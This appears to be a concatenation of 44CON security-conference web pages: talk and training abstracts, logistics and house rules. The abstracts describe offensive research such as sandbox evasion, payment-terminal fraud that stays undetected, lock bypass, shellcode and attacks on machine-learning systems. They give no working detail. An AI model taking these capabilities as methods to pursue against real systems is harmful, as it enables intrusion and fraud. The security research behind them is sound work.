          Signatureless attack detection is becoming the hot topic in threat prevention. Client side security vulnerabilities are often found in zero day exploits in the wild, meaning that signature based intrusion detection and prevention systems are not likely to catch these attacks. Signatureless detection systems are designed to detect these kinds of attacks and they do provide some additional layer of security. One of the techniques deployed by signatureless is called sandboxing. In sandboxing , the signatureless attack detection systems executes files that are being transferred in networks in sandbox. They carefully instrument the execution and based on that determine if the file was malicious. We have analyzed signatureless detection and particularly the sandboxing technique, and we have and found several issues in the concept. We have also found ways to completely evade sandboxing. We have taken some peeks into one of the market leading sandboxing product and will disclose our findings. In this presentation we will discuss the problems we have identified in signatureless attack detection and sandboxing, and disclose our findings regarding one of the market leading product. The attendees will better understands limits of these systems. Even though they will provide additional layer of security, there are issues on should know.


          Browser bug hunting – Memoirs of a last man standing

          Presented By: Atte Kettunen

          Just like drinking is not a game in Finland; neither is browser bug hunting – it’s serious business! Browser bugs have been supporting Atte Kettunen (@attekett) traditional Finnish way of living since late 2011 and he’s going to tell you all about how he has been living the dream browser bug hunting – focusing on one of the most secure browser around, Google Chrome!

          He’ll tell you a tale of his experiences with bounty programs and how those have evolved since he started way back (vendors can show the love too!) and how he’s managed to survive in the harsh environment of browser bug hunting. He’ll impart some important bug hunting social skills by showing you how and how NOT to step on the others guys toes – very competitive cottage industry is browser bug hunting. 😉

          Atte is also going to share with you how and why he selected his current target feature *(still full of bugs!), how he built his fuzzer-module(s) and the results produced. We’ll all walk a mile in a bug hunters shoes together and take a peek at the tool sets, as well as the infrastructures that are used to find browser bugs by individuals and vendors!


          Hack the Gibson – Exploiting Supercomputers

          Presented By: John Fitzpatrick & Luke Jennings

          We have had the luxury of conducting security research and penetration testing activities on a few Supercomputers on the world top 500 list. Having spent some time assessing the security of these awesome machines it’s fair to say that many of the technologies involved have been largely untouched by public security scrutiny and consequently the security bar is much lower than we have come to expect in 2013. This presentation will cover our research and demonstrate some of the most interesting and significant vulnerabilities we have uncovered so far. We will also be demonstrating 0-day exploits and previously undocumented attack techniques live so you can see how to get root on 20,000 nodes all at once. There are many ways to hack the Gibson and today you’ll learn some.


          #####EOF##### 44CON 2017 – 44CON

          44CON 2017

          44CON 2017 will take place on 13th to 15th of September 2016 at the ILEC Conference Centre. It will kick off on Wednesday 13th September at 6:30pm with our Community Evening. Registration will start at 6pm.

          Entry is free on Wednesday evening but you will have to register beforehand.

          Early Bird Tickets for 44CON 2017 went very quickly. Standard tickets are available in our shop.

          Accommodation:

          Like we did last year, we are giving you the option to book a hotel room at the same time as your ticket, for 2 nights (Wednesday and Thursday) or 3 nights (Tuesday to Thursday or Wednesday to Friday, please specify at checkout), including breakfast and WiFi, for:

          • £110 per night for a single room (inc VAT)
          • £120 per night for a double or twin room (inc VAT)

          You can also book rooms at the same price directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON17-ATT. There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

          #####EOF##### Partager un lien sur Twitter

          Partager un lien avec vos abonnés

          Nouveau sur Twitter ?

          Obtenez des mises à jour instantanées de vos amis, d'experts dans votre domaine, de vos célébrités préférées et de tout ce qui se passe dans le monde.

          Qu'est-ce que Twitter ? En savoir plus.

          #####EOF##### 44CON CYBER SECURITY 2015 Workshops – 44CON

          44CON CYBER SECURITY 2015 Workshops

          Breaking In: How to hack your way to a Cybersecurity career, and how to hack it if you already have one

          Presented By: Steve Lord

          Many people on the red side of the information security fence look at systems all the time and break them. When you walk into a room you’re checking for exits and CCTV cameras. When you get a router or a new digibox from your ISP,  you’re sat there wondering what else it does and whether or not you want it on your network. We apply our mindset to most things except people, including ourselves because we’re trained to hack systems.

          People are a system. You are a system. Your career is a system.

          Whether you’re starting out or a seasoned pro, you can apply the principles of hacking to your career to raise your career profile, influence the things that matter to you and make better career judgements. From pay rises to CVs, from job applications to interviews. Everything’s open to be hacked, so let’s hack it!

          Based on content from Steve’s 30 day e-mail course on how to hack your career and his upcoming book, Breaking In: The Pentester’s Hidden Handbook, this workshop will teach you the basics of hacking your career.

          In this workshop you will learn how to:

          • Hack your CV
          • Build a targeted profile for the job you want
          • Use OSINT to find the right certs and experiences
          • Manage recruiters
          • Hack a phone interview
          • Hack a face-to-face interview

          Over 700 people have learned how to hack their career on Steve’s free 30-day career hacking by email course at https://rawhex.com/hack-your-career/.Hacking your career can be the difference between an unrewarding job and the career you want. This workshop is being delivered exclusively for the first time at 44CON Cyber Security. If you’re not hacking your career, you’re only stealing from your own potential. Book your 44CON tickets now as this workshop is expected to fill up quickly.


          Essentials of Incident Response (Working Title)

          Presented By: Steve Armstrong

          This workshop aims to cover the three key areas required to build an effective Incident Response capability:

          1. Legal
            • Contracts/NDAs/permission to call in other staff/work off site/take IP data away from the network/site.
            • Noting that EU/US Privacy/SEC laws/Regulation in play here (Plus IP etc) – as in many IR companies are US based, what do we do about privacy/disclosure/Ip protection.
          2. Working with the team
            • What to expect when they are onsite – space/access/briefing needs
            • Getting the basis together: Points of Contact, Network Schematics, OS/App deployment info, Barrier info (AV, FW, SIEM, Logs, N/HIPS, Netflow etc).
            • What to release to who, when and how – secure methods of communicating with the team, sharing files and getting legal’s approval for all this.
            • Getting quotes or ROMs for extras like “We will just send this back to the office for off-site malware analysis”
            • What does a badly controlled engagement look like? Where does the fault lie?
          3. Tech
            • What to configure to improve logging fidelity
            • Various new MS updates for logins exe hashes, File system journalling, prefetch enabling, shadow copy enabling etc.
            • When to call it a day
            • What to do afterwards – making the remediation hold
            • Maintaining the momentum
            • Fixing the problem to prevent the reoccurrence
          #####EOF##### Archive – 44CON

          Archive

          Over the years we’ve run a lot of 44CON conferences and other events too. If you’re looking for something specific the search engine may be able to help. Here’s a list of what we’ve done over time.

          2019

          2018

          2017

          2016

          2015

          2014

          2013

          2012

          2011

          Our records, like our memories are hazy. Some talks are up on our YouTube channel.

          A list of all previous speakers can be found here. Thanks to every one of them for speaking at our events.

          #####EOF##### 44CON 2016 Training – 44CON

          44CON 2016 Training

          All training courses are run between the 12th and 14th September 2016 at 2 etc venues.

          Presented by: Joe FitzPatrick

          This course introduces and explores attacks on several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience implementing and deploying a number of low-cost hardware devices to enable access, privilege, and deception which is in some cases imperceptible from software. We’ll examine UART, JTAG and SPI interfaces on both ARM and MIPS embedded devices, representative of a wide range of embedded devices that span consumer electronics, medical devices, industrial control hardware, and mobile devices. We will observe, interact with, and exploit each interface to use physical access to enable software privilege.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Saumil Shah

          This year, we bring you a brand new class. The ARM Exploit Laboratory debuts in 2016, bringing you an intense 3 day course featuring a practical hands-on approach to exploit development on ARM based systems.

          Course Length: 3 days (12th-14th September 2016) at etc.venues The Hatton

          Presented by: Dawid Czagan

          This course has been cancelled.

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join this unique hands-on training! Dawid Czagan will discuss security bugs that he has found together with Michal Bentkowski in a number of bug bounty programs (including Google, Yahoo, Mozilla, Twitter and others). You will learn how bug hunters think and how to hunt for security bugs effectively. To be successful in bug hunting, you need to go beyond automated scanners. If you are not afraid of going into detail and doing manual/semi-automated analysis, then this hands-on training is for you.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Dominic Chell, MDSec

          The course follows chapters 1-9 of the Mobile Application Hacker’s Handbook, with a strong focus on practical attacks. Over the 2-day training course delivered by the lead author of the book, delegates will learn the tricks and techniques to hack and secure mobile applications on the iOS and Android platforms.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Jordan Wiens, Peter LaFosse & Rusty Wagner

          This course has been cancelled.

          PwnAdventure is a custom 3D MMORPG created for the Ghost in the Shellcode CTF and it’s now been transformed into a hands-on reverse engineering training class. Learn the basics of binary reverse engineering, custom network protocol analysis, all while granting yourself in-game superpowers and pwning newbs with your FPS skills.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Marcus Pinto, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Ashfaq Ansari

          This course has been cancelled.

          This training is focused on exploitation of different Windows Kernel Mode vulnerabilities ranging from Pool Overflow to Use after Free. We will cover basics of Windows Kernel Internals and hands-on fuzzing of Windows Kernel Mode drivers. We will dive deep into exploit development of various kernel mode vulnerabilities. We will also look into different vulnerabilities in terms of code and the mitigations applied to fix the respective vulnerabilities.

          Course Length: 3 days (12th-14th September 2016) at etc.venues The Hatton

          Book your 44CON 2016 training course now!

          #####EOF##### 44CON House Rules – 44CON

          44CON House Rules

          44CON House Rules

          44CON is welcoming to all. We’ve drafted these house rules to help you understand our guiding behavioural principle: Wheaton’s Law (“Don’t be a dick”). Our house rules aren’t perfect, they’re a work in progress and we’re open to suggestions via houserules@44con.com.

          These rules apply to everyone and all interpersonal interactions at the event.

          Expectations

          What we want you to get from 44CON: Knowledge. New friends. Job Opportunities. Good times.
          What we expect from you: Respect for others. Being kind. Not being a dick.

          Interpreting Wheaton’s Law

          Our crew leads are the arbiters of Wheaton’s Law. Their decision is final. If you’re given an instruction from a crew member, please follow it. If you’re given a warning, please heed it.

          Banter, a playful, friendly exchange of teasing remarks, is fine. If it’s not consensual, it’s not banter.

          Reporting concerns

          1. If you have a concern, please raise it with the clearly visible crew or at the front desk.
          2. Alternatively, please fill in a feedback form, anonymously if you prefer.
          3. If the above isn’t possible, please email houserules@44con.com with your concern.
          4. Everything is handled in confidence and we can provide space and support where needed.

          We welcome anonymous feedback, but it affects our ability to communicate outcomes.

          Grounds for removal

          We reserve the right to remove anyone from the event without reimbursement for, but not limited to, the following behaviours;

          1. Theft.
          2. Sustained harassment, discrimination or disruption.
          3. Acts of violence.
          4. Criminal activity.
          5. Any other reason where the relevant crew lead believes that your continued presence may cause a risk to the safety of yourself, others or where Wheaton’s Law has been breached to such a degree that you have acted an epic dick.

          Please note: Laws at home may not match those here. In particular, free speech isn’t protected, our computer crime laws are ridiculous and both harassment and discrimination are criminal offences.

          #####EOF##### Facebook
          Meld je aan bij je Facebook-account om te delen.
          Nieuw account maken
          #####EOF##### 44CON 2018 Talks – 44CON

          44CON 2018 Talks

          For a full list of 44CON 2018’s confirmed speakers, please click here.

          They’re All Scorpions – Successful SecOps in a Hostile Workplace

          Presented by: Pete Herzog

          Your job is to secure operations. But nobody listens to you. There’s no budget. Management keeps making bad security decisions that seem to sabotage your efforts. Do you flee or do you try harder? The security books, blogs, and tweeting pundits out there tell us we need to learn the language of business. We need to put risk in terms of money that management understands. We need to be like the management we’re trying to protect. And that’s where it all falls apart. The security to business relationship is often textbook abusive codependency. You do well and nobody notices. You fail and you get fired or worse- shamed by your peers over social media for whatever the company releases as the statement for the breach. So how do you do SecOps under those conditions? This talk will focus on new ways to approach SecOps to face the challenges you have today with business demands. We will look at new security research that will make a difference for how you do your job. Most of all we will show you technical security practices to help you sustain your new found stance.

          The UK’s Code of Practice for Security in Consumer IoT Products and Services

          Presented by: David Rogers

          In March 2018, the UK launched its Secure by Design report in order to help defend against security threats, especially for consumer Internet of Things products and services. Over the past few years, poorly secured IoT devices have been hijacked in both targeted as well as large-scale DDoS attacks such as Mirai. In addition to this, poor security can threaten both privacy and safety.

          The speaker, David Rogers authored the UK’s ‘Code of Practice for Security in Consumer IoT Products and Associated Services’, in collaboration with DCMS, NCSC, ICO and industry colleagues with extensive support from the security research community. David will discuss the guidelines within the Code of Practice, why these were prioritised and why the top three became dealing with the password problem, implementing vulnerability disclosure and acting on it and addressing software updates. David will also look at what’s next: what will the challenges be and will the Code of Practice succeed in its aims? How can IoT products possibly be certified and how will the threat landscape change in response to improving security?

          Weak analogies make poor realities – are we sitting on a Security Debt Crisis?

          Presented by: Charl van der Walt

          Cyber Security is often framed in terms of ‘Risk’- the possibility of suffering harm or loss – and the ‘Management’ of Risk to reduce uncertainty. This is familiar territory for businesses. Cyber Security falls in neatly under Risk Management, is assigned a suitable place on the organigramme, tossed some spare budget and granted a few paragraphs in the board report. NIST defines Risk as a ‘function of the likelihood of a given threat-source’s exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organisation’.

          Key theme:
          This presentation explores the idea that making cyber security analogous to risk is holding us back. How about we talk about security ‘debt’ instead? Technical Debt is already a well understood concept in software development – the cost of additional rework caused by choosing an easy solution now instead of using a better approach that would take longer or cost more. Changing our language changes how we think and how we behave. This presentation argues that such a change could have a significant impact on software security.

          In this presentation we will comment on the power of ‘analogies’ and how they’ve shaped our industry. We’ll then consider the difference between the ‘security as risk’ and the ‘security as debt’ paradigms and explore how changing paradigms may change the way we think about, talk about and measure software security. We believe this could have a very empowering effect on development managers and other security professionals who are struggling to articulate the relative benefits of security (or a lack of security) to a software product.

          Catch Me If You Can: Ephemeral Vulnerabilities in Bug Bounties

          Presented by: Shubham Shah and Michael Gianarakis

          The internet is changing, at a much faster pace today with cloud computing being so easily accessible. As the attack surface of the internet (IPv4) changes there are periods of time where vulnerabilities are present but dissipate quickly.

          By being able to monitor an organisation and effectively determine these changes, we’ve found a number of critical vulnerabilities within networks and applications that are only present for a short period of time. This presentation will detail multiple critical vulnerabilities found by participating in bug bounty programs that we classify as ephemeral vulnerabilities, and the details on how we identified and exploited them in the first place.

          For the Love of Money: Finding and exploiting vulnerabilities in mobile point of sales systems

          Presented by: Leigh-Anne Galloway and Tim Yunusov

          These days it’s hard to find a business that doesn’t accept faster payments. Mobile Point of Sales (mPOS) terminals have propelled this growth lowering the barriers for small and micro-sized businesses to accept non-cash payments. Older payment technologies like mag-stripe still account for the largest majority of all in-person transactions. This is complicated further by the introduction of new payment standards such as NFC. As with each new iteration in payment technology, inevitably weaknesses are introduced into this increasingly complex payment eco-system.

          In this talk, we ask, what are the security and fraud implications of removing the economic barriers to accepting card payments; and what are the risks associated with continued reliance on old card standards like mag-stripe? In the past, testing for payment attack vectors has been limited to the scope of individual projects and to those that have permanent access to POS and payment infrastructure. Not anymore!
          In what we believe to be the most comprehensive research conducted in this area, we consider four of the major mPOS providers spread across the US and Europe; Square, SumUp, iZettle and Paypal. We provide live demonstrations of new vulnerabilities that allow you to MitM transactions, send arbitrary code via Bluetooth and mobile application, modify payment values for mag-stripe transactions, and a vulnerability in firmware; DoS to RCE. Using this sampled geographic approach, we are able to show the current attack surface of mPOS and, to predict how this will evolve over the coming years.

          New to this talk, we will demonstrate how anyone can carry out an attack to send arbitrary code to an mPOS device using simple hardware costing less than £8. The automation of this process allows an attacker to select from a variety of pre-generated messages to send to the mPOS during the transaction process. With this an attacker can tamper with the process to give the appearance that a transaction has been completed when it has not been authorized. Or, a fraudulent merchant could manipulate the process to force a victim to approve multiple transactions.

          Finally, for audience members that are interested in integrating testing practices into their organisation or research practices, we will show you how to use mPOS to identify weaknesses in payment technologies, and how to remain undetected in spite of anti-fraud and security mechanisms.

          Ghost in the Locks – owning electronic locks without leaving a trace

          Presented by: Tomi Tuominen and Timo Hirvonen

          A little over ten years ago, a friend of ours returned to his hotel room to find that his laptop was gone. The door to his room showed no signs of forced entry; there was no record that the electronic lock had been accessed while he was away; and there was certainly no evidence that this electronic lock, deployed on millions of doors in more than 150 countries worldwide, could have been hacked.

          Sometimes hacking boils down to spending more time on something than anyone could reasonably expect. This talk is an ode to that cliché. It is the culmination of a decade-long quest to find out whether the most widely used electronic lock in the world can be bypassed without leaving a trace. And in this adventure, breaking into hotel rooms is only the beginning. But lucky for all of us, unlike most cases of theft from hotel rooms, this story has a happy ending.

          Pwning the 44CON Nerf gun

          Presented by: Chris Wade and Dave Lodge

          Con speakers fear the Nerf gun. Overrun your talk time at your peril; Steve will shoot your arse with extreme prejudice until you STFU. We had to find a way to pwn the gun and shoot him back.

          That’s when we found the Nerf Terrascout: a remote tank gun controlled over 2.4GHz, with a video feed to the remote, complete with crosshairs.

          At first, we thought this would be a trivial job: figure out the RF and take control. It turned in to a mammoth hardware, firmware and RF reversing project.

          This puppy is so over-specced it would drive you to tears.

          The talk will cover the fails, hair loss and eventual success. There won’t be any smart dildos in it, though some of the techniques used are equally suited to teledildonics exploitation, if that’s your thing.

          Reversing RF in a high frequency environment using SDRs is challenging. We’ll discuss how we worked around these issues using hardware reversing skills.

          We had to import hardware from China for this project, which we could then programme ourselves using SPI, impersonate the legitimate controller and ‘jack the tank gun.

          This talk will of course include a live demonstration of hijacking the tank gun and (possibly) shooting Steve.

          JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and face recognition – and frankly, everywhere else

          Presented by: Guy Barnhart-Magen and Ezra Caltum

          Exploits, Backdoors, and Hacks: words we do not commonly hear when speaking of Machine Learning (ML). In this talk, I will present the relatively new field of hacking and manipulate machine learning systems and the potential these techniques pose for active offensive research.
          The study of Adversarial ML allows us to leverage the techniques used by these algorithms to find weak points and exploit them in order to achieve:

          • Unexpected consequences (why did it decide this rifle is a banana?)
          • Data leakage (how did they know Joe has diabetes)
          • Memory corruption and other exploitation techniques (boom! RCE)
          • Influence the output

          In other words, while ML is great at identifying and classifying patterns, an attacker can take advantage of this and take control of the system.
          This talk is an extension of research made by many people, including presenters at DefCon, CCC, and others – a live demo will be shown on stage!

          Garbage In, RCE Out 🙂

          Kill All Humans… Bugs! : Machine Learning to the rescue of code review

          Presented by: Philippe Arteau

          Security code reviews with static analysis tools have inherent problems. While many potential vulnerabilities are found quickly, the number of false positives can be overwhelmingly high on large applications (think millions of lines of code). Even with just a few dozen findings, the human fatigue can have a big impact on the triage. Our research addresses these issues by applying machine learning (ML) to automatically triage the output of static analysis tools.

          The objective is to classify vulnerabilities, such as SQL injection or Cross-Site Scripting, using supervised machine learning algorithms. Supervised learning implies that a subset of issues has been classified as false positives or real vulnerabilities. Since algorithms need more than just basic attributes to be efficient, datasets are enriched with various indicators that human look at when reviewing code. Attributes fall in four categories: location (class names, packages, module), data flow sources (method calls, variables’ flow), API (sink, source) and dynamic expression. This talk uncovers the level of effectiveness of these various attributes with common algorithms (random forest, naive Bayes and tree) and releases “Find Security Bugs ML”, a set of open-source tools that builds enriched datasets and classify findings using ML algorithms.

          Additionally, demonstrations will be made to cover the tools’ main functionalities. These include large-scale vulnerability scanning while prioritizing issues presented to reviewers and double checking classification made by developers.

          Applying the tool on Java libraries, including the Spring Framework, allowed us to find some interesting 0-day vulnerabilities. Attendees should be able to replicate similar findings on their enterprise applications or third party’s libraries, even when they don’t have the application’s source code due to Java’s bytecode support.

          So You Want to Red Team?

          Presented by: Lawrence Munro and Matt Lorentzen

          So, you want to be a Red Teamer, but you can’t get into it because you’re not a big enough name, or you lack the opportunities and experience to develop the skill-set? It’s extremely hard to develop your red teaming skills without access to legitimate work within this sphere (or legal, at least!). The skills are advanced and require hours spent in enterprise environments honing your tradecraft, but access to this world can be a chicken and the egg situation.

          In this talk, we discuss the skill differences between pen testing and red teaming and how to break into a red team. We approach the topic from both a career / tactical angle as well as how to close the upskilling gap. We introduce a new open source lab (Fortis), which provides a new approach to simulating user interactions (using unique ‘Digital People’) to help you develop the right skillsets without going out-of-scope and staying on the right side of the law.

          Automating myself out of a job – A pentesters guide to left shifting security testing

          Presented by: Jahmel Harris

          Security is big business. Between security companies trying to sell “security-in-a-box” and infosec professionals charging a fortune to tell devs “you’re doing it wrong”, is it any wonder security is an area that is often deprioritised?

          In this talk, we’ll look at what we should be doing to left shift security testing i.e. make it easier to perform security tests during development. By working harder to integrate ourselves into the development process, we can start to see what can and should be automated (and where a security specialist should actually fit in). We’ll look to understand that writing secure applications does not need to be costly and not all applications need to have the same level of security.

          By using actual vulnerabilities found during pen tests as examples, we will look at the tools and techniques we can use to detect vulnerabilities automatically and early in the development lifecycle, ultimately allowing us to release software often and quickly while still having a good understanding of the application’s risk.

          The aim of this talk will be to understand why security has not kept current with modern development practices and give developers the ability to integrate security into the development pipeline.

          Using SmartNICs to Provide Better Data Center Security

          Presented by: Jack Matheson  assisted by Ahmad Atamlh

          Data Center security has been forced to reinvent itself as software complexity increases, networking capabilities grow more agile, and attack complexity turns unmanageable. With this change, the need for security policy enforcement to be handled at the edge has pushed functionality onto host compute systems, resulting in inherent performance loss and security weakness due to consolidation of resources.

          In the first part of the talk we will be presenting a SmartNIC-based model for data-center security that solves both the performance problem and the security problems of edge-centric policy models. The model features a more robust isolation of responsibilities, superior offload capabilities, significantly better scaling of policy, and unique visibility opportunities.

          To illustrate this, we present a SmartNIC-based reference architecture for network layout, as well as examples of SmartNIC security controls and their resulting threat models.

          The second part of the talk will unveil a new innovative technique for tamper proof host introspection as SmartNICs are in a unique position to analyze and inspect the memory of the host to which they are attached. Normally, this functionality is reserved for a hypervisor, where it is known as ‘guest introspection’ or ‘virtual-machine introspection’. With host introspection, security controls no longer live in the hypervisor, but on the SmartNIC itself, on a separate trust domain. In this way, the visibility normally achieved with guest introspection can be performed for the entire host memory in an isolated and secure area. In order for host introspection to work in the same way as guest introspection, memory is DMA transferred in bursts over the PCI-e bus that attaches the SmartNIC to the host. As this method can be subverted to hide unwanted software, we will demonstrate a novel approach to tamper proof the acquisition of memory and for performing live introspection.

          Host introspection complements the network controls implemented using the SmartNIC by enabling the measurement of the integrity and the behavior of workloads (virtual machines, containers, bare metal servers) to identify possible indicators of compromise. The visibility and context gained also enhances the granularity of network controls, resulting in measurably better security for the data center compared to traditional software-only based controls.

          A live demo will showcase this capability.

          Bypassing Port-Security In 2018 – Defeating MacSEC and 802.1x-2010

          Presented by: Gabriel Ryan

          Existing techniques for bypassing wired port security are limited to attacking 802.1x-2004, which does not provide encryption or the ability to perform authentication on a packet-by-packet basis [1][2][3][4]. The development of 802.1x-2010 mitigates these issues by using MacSEC to provide Layer 2 encryption and packet integrity check to the protocol [5]. Since MacSEC encrypts data on a hop-by-hop basis, it successfully protects against the bridge-based attacks pioneered by the likes of Steve Riley, Abb, and Alva Duckwall [5][6].

          In addition to the development of 802.1x-2010, improved 802.1x support by peripheral devices such as printers also poses a challenge to attackers. Gone are the days in which bypassing 802.1x was as simple as finding a printer and spoofing address, as hardware manufacturers have gotten smarter.

          In this talk, we will introduce a novel technique for bypassing 802.1x-2010 by demonstrating how MacSEC fails when weak forms of EAP are used. Additionally, we will discuss how improved 802.1x support by peripheral devices does not necessarily translate to improved port-security due to the widespread use of weak EAP. Finally, we will consider how improvements to the Linux kernel have made bridge-based techniques easier to implement and demonstrate an alternative to using packet injection for network interaction. We have packaged each of these techniques and improvements into an open source tool called Silent Bridge, which we plan on releasing at the conference.

          References:

          1. https://blogs.technet.microsoft.com/steriley/2005/08/11/august-article-802-1x-on-wired-networks-considered-harmful/
          2. https://www.defcon.org/images/defcon-19/dc-19-presentations/Duckwall/DEFCON-19-Duckwall-Bridge-Too-Far.pdf
          3. https://www.gremwell.com/marvin-mitm-tapping-dot1x-links
          4. https://hackinparis.com/data/slides/2017/2017_Legrand_Valerian_802.1x_Network_Access_Control_and_Bypass_Techniques.pdf
          5. https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/identity-based-networking-services/deploy_guide_c17-663760.html
          6. https://1.ieee802.org/security/802-1ae/

          Make ARM Shellcode Great Again

          Presented by: Saumil Shah

          Compared to x86, ARM shellcode has made little progress. The x86 hardware is largely homogenous. ARM, however, has several versions and variants across devices today. There are several constraints and subtleties involved in writing production quality ARM shellcode which works on modern ARM hardware, not just on QEMU emulators.

          In this talk, we shall explore issues such as overcoming cache coherency, reliable polymorphic shellcode, ARM egghunting and last but not the least, polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend agaisnt attacks using age old signature based techniques. There will be demonstrations of my shellcode on ARM IoT devices featuring different types of ARM architecture. A detailed article shall also be submitted to PoC||GTFO closer to the time of the conference.

          Exploits with Scratch

          Presented by: Kevin Sheldrake

          Scratch is a programming language and IDE targeted at teaching young children how to code. The environment is sprite-based with all code residing behind each of the sprites and the stage (background). It is particularly good at developing games not unlike the flash-based games of the 90s/00s. Typically, the Scratch environment is a sandbox limiting all actions to objects within its own world. With the offline version of Scratch v2, however, it is possible to load ‘experimental HTTP extensions’ that can introduce new blocks linked to python functions via a web service API.

          Using the experimental extensions, I have implemented a set of blocks that allow access to TCP/IP functions. With these blocks it is possible to fuzz and exploit vulnerable services on a network-accessible victim machine. As a demonstration I have developed a PoC for the web server running on Saumil Shah’s tinysploit (stack smash) plus PoCs for two echo servers I have added to it (stack smash and format string vulnerability).

          The aims of the talk are to show that the (supposedly) sandboxed Scratch can be used to send evil packets to the network, and also to show that fuzzing and building exploits doesn’t have to involve coding abilities beyond those required to develop in Scratch. In other words, if you (or your child) wishes to learn how to write your own exploits, then this is all possible with Scratch and my experimental extension.

          The talk will cover the intricacies of the Scratch extension API and the limitations that need to be overcome to make it usable, plus how these simple concepts can be strung together to create exploits.

          Subverting Direct X Kernel For Gaining Remote System

          Presented by: Rancho Han and Chen Nan

          Since Edge introduced the win32k filter mechanism, the way of escaping the sandbox from kernel is getting narrower and narrower. In fact, on the latest win10 rs4, most types of GDI objects could not be created in the content process of Edge. In addition, the type isolation makes it very difficult to exploit a win32k bug. This is a huge challenge for breaking Edge sandbox now. However, Edge allows us to access the direct x kernel from the unfiltered syscall functions.

          Last year, Tencent ZhanluLab began to study the Direct X subsystem, and we discovered 10+ bugs in few months. In the first part of this talk, we start with an overview of direct x subsystem and discuss how to analyze its interfaces and internal objects. After that, we explain three bugs representing three typical security flaws. Among the vulnerabilities we discovered, a few of them are very interesting, and it is a bit special to exploit them. We successfully leverage a vulnerability to break the Edge and escalate privilege to system. We will disclose all the details of this exploit in the second part of this talk.

          Insight into fuzzing and pwning of Adobe Flash

          Presented by: Jie Zeng

          In recent years, more hacker attacks (Advanced Persistent Threat) for Adobe Flash Player have taken in the wild. Therefore, Adobe Flash manufacturers have higher security requirements. Various mitigations were added. At the same time more security researchers are also beginning to study the security issues of Adobe Flash, so more and more security vulnerabilities have been discovered.

          This talk will discuss how I found vulnerabilities, and the main Flash attack surface I discovered.

          And then I will carefully explain a few of the representative vulnerabilities that I have discovered, analyse the root cause of the vulnerability, and how the patches are patched.

          Finally, when we have found a vulnerability that want to write exploit, we will encounter many mitigations. So I will talk about the major mitigations that Flash have added, including memory protect, isolators of heaps, CFG and Memory management of Flash.
          So in order to bypass these mitigations the exploit becomes more and more complicated, and I will share a method of memory layout that is still feasible to bypass the isolators of heaps.

          How to Explain Post-Quantum Cryptography to a Middle School Student

          Presented by: Klaus Schmeh

          One of the hottest topics in current crypto research is Post-Quantum Cryptography. This branch of cryptography addresses asymmetric crypto systems that are not prone to quantum computers.

          Virtually all asymmetric crypto systems currently in use (Diffie-Hellman, RSA, DSA, and Elliptic Curve Crypto Systems) are not Post-Quantum. They will be useless, once advanced quantum computers will be available. Quantum computer technology has made considerable progress in recent years, with major organisations, like Google, NSA, and NASA, investing in it.

          Post-Quantum Cryptography uses advanced mathematical concepts. Even if one knows the basics of current asymmetric cryptography (integer factorisation, discrete logarithms, …), Post-Quantum algorithms are hard to understand.

          The goal of this presentation is to explain Post-Quantum Cryptography in a way that is comprehensible for non-mathematicians. Five families of crypto systems (as good as all known Post-Quantum algorithms belong to these) will be introduced:

          Lattice-based systems:

          The concept of lattice-based asymmetric encryption will be explained with a two-dimensional grid (real-world implementations use 250 dimensions and more). Some lattice-based ciphers (e.g., New Hope) make use of the Learning with Error (LWE) concept. I will demonstrate LWE encryption in a way that is understandable to somebody who knows Gaussian elimination (this is taught at middle school). Other lattice-based systems (especially NTRU) use truncated polynomials, which I will also explain in a simple way.

          Code-based systems:

          McEliece and a few other asymmetric ciphers are based on error correction codes. While teaching the whole McEliece algorithm might be too complex for a 44CON presentation, it is certainly possible to explain error correction codes and the main McEliece fundamentals.

          Non-commutative systems:

          There are nice ways to explain non-commutative groups and the crypto systems based on these, using everyday-life examples. Especially, twisting a Rubik’s Cube and plaiting a braid are easy-to-understand group operations a crypto system can be built on.

          Multivariate systems:

          Multivariate crypto can be explained to somebody who knows Gaussian elimination.
          Hash-based signatures: If properly explained, Hash-based signatures are easier to understand than any other asymmetric crypto scheme.
          I will explain these systems with cartoons, drawings, photographs, a Rubik’s Cube and other items.

          In addition, I will give a short introduction to quantum computers and the current Post-Quantum Crypto Competition (organised by US authority NIST).

          Security module for php7 – Killing bugclasses and virtual-patching the rest!

          Presented by: Julien Voisin and Thibault Koechlin

          Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.

          Reverse Engineering and Bug Hunting on KMDF Drivers

          Presented by: Enrique Nissim

          Numerous technical articles, presentations, and even books exists about reverse engineering the Windows Driver Model (WDM) for purposes that vary from simply understanding how a specific driver works, to malware analysis and bug hunting. On the other hand, Microsoft has been providing the Kernel Mode Driver Framework (KMDF) for quite a while and we now see more and more drivers shifting to this framework instead of interacting directly with the OS like in the old WDM times. Yet, there is close to no information on how to approach this model from a reverse engineering and offensive standpoint.
